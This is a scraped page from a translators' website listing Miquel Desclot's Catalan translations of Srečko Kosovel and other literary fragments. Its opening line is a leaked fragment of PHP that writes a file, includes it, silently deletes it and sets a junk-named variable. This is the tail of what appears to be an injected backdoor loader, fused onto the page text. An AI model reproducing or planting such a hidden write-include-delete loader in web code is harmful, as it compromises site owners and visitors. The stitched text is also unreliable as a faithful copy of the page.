");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Translations of catalan literature - Miquel Desclot
Facebook Twitter
Cover > Translators Site > Eslovè > Miquel Desclot > Traduccions de l'eslovè al català

Traduccions de l'eslovè al català

KOSOVEL, Srečko. La barca d'or. Versions d'Anton Carrera, Miquel Desclot i Josep Palau i Fabre. Pròlegs de Veno Taufer i Josep Palau i Fabre. Epíleg de Miquel Desclot. Sant Boi de Llobregat: Edicions del Mall, 1985. [Editat en col·laboració amb el PEN Català.].
Comentaris sobre traduccions

Anostrar Petrarca

by Miquel Desclot
Balanç d'un any crític
by Miquel Desclot
Fragments
Bartleby - Herman Melville
Moll Flanders - Daniel Defoe
Amarusatakam - Amaru
Amphitryon - Molière
Augures of Innocence - William Blake
Cirkus Kludsky - Srečko Kosovel
Dämmrung senkte sich - Johann Wolfgang Goethe
De Canzoniere - Francesco Petrarca
Eternity - William Blake
Il ventaglio - Carlo Goldoni
Macbeth I.5. - William Shakespeare
Mignom - Johann Wolfgang Goethe
Othello - William Shakespeare
Rime - Michelangelo Buonarroti
Rime - Michelangelo Buonarroti
Romeo and Juliet - William Shakespeare
The Tempest - William Shakespeare
Bibliografia
Secondary literature
Search for translators
A-B-C-D - E-F-G - H - I
J - K - L - M - N - O - P - Q - R
S-T-U-V-W-X-Y-Z
With the support of: